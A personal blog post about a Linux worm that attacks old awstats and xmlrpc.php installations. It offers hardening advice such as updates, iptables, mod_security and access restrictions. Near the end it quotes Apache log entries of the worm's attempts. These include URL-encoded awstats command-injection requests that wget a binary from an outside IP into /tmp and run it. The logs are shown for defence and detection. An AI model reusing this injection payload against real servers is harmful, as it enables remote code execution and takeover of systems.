Linux worm on the loose

There is a worm on the loose which will attack linux webservers running old versions of programs like wordpress, awstats, etc. More information about this worm can be found:

So, there it is, Linux can be attacked by worms just as easy as Windows systems? Well, yes and no. If you don’t manage your system properly it probably is insecure and vulnerable to worms and hackers; but if you keep your software up to date run at least a host based firewall (iptables) and secure your apache webserver with mod_security, both OS’es can be pretty safe.
There are however a few things in favor of Linux.

It’s Open Source, so anyone can look at the code and check if there are any backdoors or bufferoverflows. This happens a lot and also these bugs are found and published (for instance on Bugtraq). As a rule the open source folks take this very serious (even personal) and a patch is available in no-time.

With closed source you depend on the vendor to keep your software safe. Security leaks are found by either reverse engineering the code or by firing massive pseudo random data at the server. When the server crashes with certain error codes, you found a bug which might be exploitable. Security research finds these kinds of holes all the time and it can take uptill a half year or more before a vendor releases a patch to close the hole. And since hackers can be tought of as a kind of security researcher…

The Linux people tend to know more about there system. With Windows a lot of “administrators” never fire up a dos box and have a look at netstat -an to see the network connections which are active on their box. On Linux, you always use a shell and netstat -tupan | grep LISTEN not only shows you the ports you are willing to receive connections on, but also the process name attached to that port.
Also Microsoft tends to hide a lot of information from their users. On one hand this makes the system very easy to install and use, but on the other hand this makes it very difficult to finetune the system to a lean and mean webserver for instance. Removing unnecessary software means increasing security, increasing performance, reducing maintenance time, etcetera. With Linux you can reduce software down to the bone. Neat examples of this are Toms root and boot disk which runs multiuser, network enabled Linux from one bootable floppy!

Anyway, back to the worm. Want to know if your computer is vulnerable? Some quick and easy things to do are, run a locate xmlrpc.php and a locate awstats. When you run awstats, upgrade to the latest version, rename your URL so they don’t start with awstats but have something like my-stats. This will make it nearly impossible for worms to explot future security holes. Also have a .htaccess in you awstats directory so you need a username and password to access the statistics. Test your access and watch your webserver logs while you are testing.

Install and use mod_security on your apache webserver. Play around with rules.conf so you see what gets blocked and what is allowed. Use Google to find good examples of other peoples rules.conf (Sometimes called mod_security.conf).

Block the admin access to your blog or CMS so you can only access those from defined ip-adresses.

There are a number of other measures, but i will adress those at a later time.
By the way, here is some apache logging of a worm trying to get in:

24.174.32.12 - - "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 296
24.174.32.12 - - "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 296
24.174.32.12 - - "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 304
24.174.32.12 - - "POST /xmlrpc.php HTTP/1.1" 404 288
24.174.32.12 - - "POST /blog/xmlrpc.php HTTP/1.1" 404 293
24.174.32.12 - - "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300
24.174.32.12 - - "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301
24.174.32.12 - - "POST /drupal/xmlrpc.php HTTP/1.1" 404 295
24.174.32.12 - - "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301
24.174.32.12 - - "POST /wordpress/xmlrpc.php HTTP/1.1" 404 298
24.174.32.12 - - "POST /xmlrpc.php HTTP/1.1" 404 288
24.174.32.12 - - "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295
24.174.32.12 - - "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295

You see every logrule with a response code of 404, that is a good sign. It means the webserver responds with a page not found. And those percentage things are the means to get in. Thats what to use when specifying a mod_security rule to block all those kind of attempts proactively. Have a look at:
http://www.gotroot.com/downloads/ftp/mod_security/rules.conf

Author: Ewald

The grey haired professor